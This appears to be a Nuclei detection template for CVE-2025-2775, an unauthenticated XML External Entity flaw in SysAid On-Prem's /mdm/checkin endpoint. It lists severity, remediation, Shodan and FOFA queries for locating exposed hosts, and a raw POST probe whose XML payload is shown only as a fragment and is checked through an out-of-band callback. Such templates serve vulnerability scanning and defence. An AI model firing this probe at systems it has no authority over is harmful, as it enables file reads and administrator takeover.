id: CVE-2025-2775 info: name: SysAid On-Prem <= 23.3.40 - XML External Entity author: johnk3r severity: critical description: | SysAid On-Prem versions <= 23.3.40 are vulnerable to an unauthenticated XML External Entity (XXE) vulnerability in the Checkin processing functionality, allowing for administrator account takeover and file read primitives. impact: | Unauthenticated attackers can exploit XXE vulnerabilities in the Checkin endpoint to read arbitrary files, potentially leading to administrator account takeover and complete system compromise. remediation: | Upgrade to SysAid On-Prem version 24.40.60 or later that properly disables external entity processing. reference: - https://labs.watchtowr.com/sysowned-your-friendly-rce-support-ticket/ - https://documentation.sysaid.com/docs/24-40-60 classification: epss-score: 0.69265 epss-percentile: 0.9867 cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:L cvss-score: 9.3 cve-id: CVE-2025-2775 cwe-id: CWE-611 metadata: max-request: 1 vendor: sysaid product: sysaid shodan-query: http.favicon.hash:"1540720428" fofa-query: icon_hash=1540720428 tags: cve,cve2025,oast,sysaid,xxe,kev,vkev,vuln variables: filename: "{{to_lower(rand_text_alpha(5))}}" http: - raw: - | POST /mdm/checkin HTTP/1.1 Host: {{Hostname}} Content-Type: application/xml %foo; ]> matchers-condition: and matchers: - type: word part: interactsh_protocol words: - "http" - type: word part: interactsh_request words: - "User-Agent: Java" # digest: 4b0a004830460221008069cb90c70e43bbc1992dad03852d7a4ba9c9ca8ace8c886465650da47e0a3b022100923637f38e8d65e524990cafdfbeacc79ae1d9d6377d9bc66c9e6e9695f2a228:922c64590222798bb761d5b6d8e72950